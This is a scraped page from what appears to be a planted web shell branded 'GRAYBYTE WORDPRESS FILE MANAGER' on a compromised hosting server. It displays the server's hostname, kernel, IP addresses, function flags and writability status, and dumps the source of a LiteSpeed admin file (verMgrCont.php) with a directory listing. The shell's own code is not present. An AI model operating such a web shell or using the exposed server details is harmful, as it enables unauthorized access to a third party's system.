✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ premium290.web-hosting.com ​🇻​♯➤ 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 63.250.38.37 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.138
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /usr/local/lsws/admin/html.6.3.2/service//verMgrCont.php
<h2 class="bottom_bar">Version Management</h2>
<?php
	$release_log_url = 'https://www.litespeedtech.com/products/litespeed-web-server/release-log';
	echo '<p class="xtbl_value"><a target=_new href="' . $release_log_url . '">Release Notes</a></p>';

	if (isset($error) && $error != NULL) {
		echo '<p class="gui_error">Error: ' . $error . '</p>';
	}

	$product->getNewVersion();
	$product->getInstalled();

	if (isset($service->license['type']))
	{
?>
		<table width="100%" class="xtbl" border="0" cellpadding="5" cellspacing="1">
			<tr class="xtbl_header">
				<td colspan="5" class="xtbl_title" nowrap>License Info</td>
			</tr>
			<tr class="xtbl_label"><td width="120">Type</td><td>Serial</td><td>Expiration Date</td><td>Software Update Expiration</td><td>Action</td></tr>
			<tr class="xtbl_value"><td>
<?php

	$updexpdate = $service->license['updateExpires_date'];
	$timeleft = $service->license['updateExpires'] - time();
	if ($timeleft < 172800) // 2 days
	{
		$exptag = ($timeleft < 0) ? 'Expired' : 'Expiring soon';
		$updexpdate .= '<span style="background: rgb(230, 3, 3); margin-left:6px; padding:2px 6px;border-radius: 3px;color: white;">' . $exptag . '</span>';
	}
	$features = '';
	$feature = $service->license['feature'] & 11; // 1011
	if ($feature == 1) {
		$features = ' (LSCache Standard)';
	}
	elseif ($feature == 9) {
		$features = ' (LiteMage Starter)';
	}
	elseif ($feature == 11) {
		$features = ' (LiteMage Standard)';
	}
	elseif ($feature == 3) {
		$features = ' (LiteMage Unlimited)';
	}

	echo $service->license['type'] . $features . '</td><td>'
			. $service->license['serial'] . '</td><td>'
			. $service->license['expires_date'] . '</td><td>'
			. $updexpdate . '</td><td>'
			. '<a href="javascript:vermgr_checklic()" title="Check License Status Now">Validate License</a>';
?>
	</td></tr>
	</table>

<?php
	}

	if ( $product->new_release != NULL)
	{
?>
		<table width="100%" class="xtbl" border="0" cellpadding="5" cellspacing="1">
			<tr class="xtbl_header">
				<td colspan="2" class="xtbl_title" nowrap>Latest Release</td>
			</tr>
			<tr class="xtbl_label"><td width="120">Release</td><td>Action</td></tr>
			<tr class="xtbl_value"><td>
<?php
		echo $product->new_version . '</td><td>';
		if ($product->isInstalled($product->new_version))
			echo '<a href="javascript:vermgr(\'download\',\'' . $product->new_version . '\')">Force Reinstall</a>';
		else
			echo '<a href="javascript:vermgr(\'download\',\'' . $product->new_version . '\')">Download/Upgrade</a>';

?>

	</td></tr>
	</table>


<?php
	}
?>


		<table width="100%" class="xtbl" border="0" cellpadding="5" cellspacing="1">
			<tr class="xtbl_header">
				<td colspan="2" class="xtbl_title" nowrap>Installed Versions</td>
			</tr>
			<tr class="xtbl_label">
				<td width="120">Version</td><td>Actions</td>
			</tr>
<?php
	natsort($product->installed_releases);

 	$product->installed_releases = array_reverse($product->installed_releases);


	foreach( $product->installed_releases as $rel )
	{
		echo '<tr class="xtbl_value"><td>' . $rel . '</td><td nowrap>';
		if ( $product->version !== $rel )
		{
			echo '<a href="javascript:vermgr(\'switchTo\',\'' . $rel . '\')">SwitchTo</a>&nbsp;&nbsp;';
			echo '<a href="javascript:vermgr(\'remove\',\'' . $rel . '\')">Remove</a>&nbsp;&nbsp;';
		}
		else {
			echo 'Active (Build ' . $product->cur_build . ')&nbsp;&nbsp;';
		}
		echo '<a href="javascript:vermgr(\'download\',\'' . $rel . '\')">Force Reinstall</a>';
		echo "</td></tr>\n";
	}
?>
        </table>



Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
15 Apr 2025 7.57 PM
root / root
0755
blockip_html.php
0.633 KB
15 Apr 2025 7.57 PM
root / root
0644
graph_html.php
7.04 KB
15 Apr 2025 7.57 PM
root / root
0644
graph_xml.php
3.215 KB
15 Apr 2025 7.57 PM
root / root
0644
homeCont.php
5.298 KB
15 Apr 2025 7.57 PM
root / root
0644
logViewer.php
2.104 KB
15 Apr 2025 7.57 PM
root / root
0644
realtimeReport.php
11.438 KB
15 Apr 2025 7.57 PM
root / root
0644
realtimeReqReport.php
6.892 KB
15 Apr 2025 7.57 PM
root / root
0644
restart.html
0.619 KB
15 Apr 2025 7.57 PM
root / root
0644
serviceMgr.php
2.074 KB
15 Apr 2025 7.57 PM
root / root
0644
verMgrCont.php
3.42 KB
15 Apr 2025 7.57 PM
root / root
0644
verMgrDownload.php
0.513 KB
15 Apr 2025 7.57 PM
root / root
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF